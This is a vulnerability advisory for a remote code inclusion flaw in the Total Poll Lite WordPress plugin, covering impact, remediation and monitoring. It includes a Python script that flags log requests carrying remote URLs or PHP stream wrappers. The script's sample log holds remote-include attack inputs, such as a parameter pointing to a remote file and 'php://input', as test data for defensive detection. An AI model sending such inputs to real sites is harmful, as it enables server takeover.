CVE-2026-27044

TotalSuite · Total Poll Lite

Total Poll Lite is vulnerable to Remote Code Inclusion (RCI) due to improper control of code generation. This affects versions up to and including 4.12.0.

Executive summary

The Total Poll Lite WordPress plugin contains a critical Remote Code Inclusion vulnerability that allows unauthenticated attackers to execute arbitrary code on the host server.

Vulnerability

This is a Remote Code Inclusion (RCI) vulnerability caused by the improper control of code generation within the totalpoll-lite component. An unauthenticated attacker can manipulate the plugin to include and execute remote files or malicious code strings.

Business impact

RCI vulnerabilities are among the most severe, as they provide a direct path to Remote Code Execution (RCE). An attacker can take full control of the web server, deface the website, or use the server as a jumping-off point for further internal network attacks. The CVSS score of 9.9 reflects a near-maximum severity level.

Remediation

Immediate Action: Update Total Poll Lite to a version newer than 4.12.0 as soon as possible. If no patched version is available, deactivate and remove the plugin until a fix is released.

Proactive Monitoring: Check for the presence of unauthorized PHP files in the WordPress uploads directory and review logs for requests fetching remote assets.

Compensating Controls: Use a WAF to block requests containing external URLs in parameters and disable allow_url_include in the PHP configuration.
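As an added triage example (not from the advisory or the plugin's own code), the Python script below applies the monitoring and compensating-control advice above: it flags access-log requests whose query-string values begin with a remote URL or PHP stream wrapper, and checks whether allow_url_include is still enabled in php.ini text. The log lines, IPs and request paths are constructed placeholders, not the plugin's real endpoints.

```python
# Added triage helper for the Total Poll Lite RCI advisory (CVE-2026-27044); sample data is constructed.
import re
from urllib.parse import urlsplit, parse_qsl

# Combined-log-format line: client IP, request line, status. Other fields are ignored.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Schemes and PHP stream wrappers that an include() with allow_url_include=On could resolve remotely.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?://|ftps?://|//|data:|php://)', re.IGNORECASE)

def has_remote_url_param(target: str) -> bool:
    """True if any query-string value in the request target starts with a remote URL or wrapper."""
    query = urlsplit(target).query
    return any(REMOTE_VALUE_RE.match(v) for _, v in parse_qsl(query, keep_blank_values=True))

def flag_remote_include_requests(log_text: str) -> list:
    """Return (ip, target, status) for every request carrying a remote URL in a parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and has_remote_url_param(m['target']):
            hits.append((m['ip'], m['target'], int(m['status'])))
    return hits

def allow_url_include_enabled(ini_text: str) -> bool:
    """Parse php.ini text; True only if allow_url_include is explicitly On (PHP's default is Off)."""
    for raw in ini_text.splitlines():
        line = raw.split(';', 1)[0].strip()  # drop comments
        if '=' in line:
            key, _, value = line.partition('=')
            if key.strip().lower() == 'allow_url_include':
                return value.strip().strip('"\'').lower() in ('1', 'on', 'true', 'yes')
    return False

# Constructed sample data: paths are illustrative placeholders, not the plugin's actual endpoints.
SAMPLE_LOG = (
    '203.0.113.5 - - [01/Mar/2026:10:00:01 +0000] "GET /?page_id=12 HTTP/1.1" 200 5120\n'
    '203.0.113.9 - - [01/Mar/2026:10:00:02 +0000] "GET /index.php?template=http://198.51.100.7/x.txt HTTP/1.1" 200 312\n'
    '198.51.100.3 - - [01/Mar/2026:10:00:03 +0000] "GET /index.php?file=php://input HTTP/1.1" 500 0\n'
    '203.0.113.5 - - [01/Mar/2026:10:00:04 +0000] "GET /?s=see+https://example.org+for+docs HTTP/1.1" 200 4000\n'
)
SAMPLE_INI = "; php.ini excerpt (constructed)\nallow_url_fopen = On\nallow_url_include = On\n"

if __name__ == '__main__':
    for ip, target, status in flag_remote_include_requests(SAMPLE_LOG):
        print(f'remote-URL parameter from {ip}: {target} (HTTP {status})')
    print('allow_url_include enabled:', allow_url_include_enabled(SAMPLE_INI))
```

The fourth sample line shows the intended false-positive handling: a URL embedded mid-text in a search term is not flagged, only values that begin with a remote scheme or wrapper are.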

Exploitation status

Public Exploit Available: No

Analyst recommendation

The critical nature of this vulnerability (CVSS 9.9) necessitates immediate action. Organizations must update or remove this plugin immediately. RCI allows for total system takeover, making this the highest priority for WordPress administrators in this batch.